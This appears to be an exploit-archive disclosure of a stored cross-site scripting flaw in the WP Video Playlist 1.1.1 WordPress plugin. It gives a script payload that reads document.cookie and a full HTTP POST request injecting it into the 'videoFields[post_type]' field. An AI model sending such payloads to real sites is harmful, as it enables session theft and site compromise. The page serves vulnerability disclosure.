WordPress WP Video Playlist 1.1.1 Cross Site Scripting

WordPress WP Video Playlist 1.1.1 Cross Site Scripting: Posted Apr 15, 2024; Authored by Erdemstar; WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 44b6783873b84d60c9427dd76b9a98383fd7f993964765bebb0b876b91c1beda; Download | Favorite | View

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 12 April 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.1.1

# Proof Of Concept:
1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".

# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w
# Vulnerable Property at Request: videoFields[post_type]
# Payload: <script>alert(document.cookie)</script>
# Request:
POST /wp-admin/options.php HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 395
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 138 files
Ubuntu 73 files
Gentoo 33 files
Debian 28 files
Sebastian Hamann 8 files
Jann Horn 7 files
Moritz Abrell 6 files
Jaggar Henry 6 files
Google Security Research 6 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,945)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,659)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,783)
UNIX (9,443)
UnixWare (187)
Windows (6,679)
Other

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Share This

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems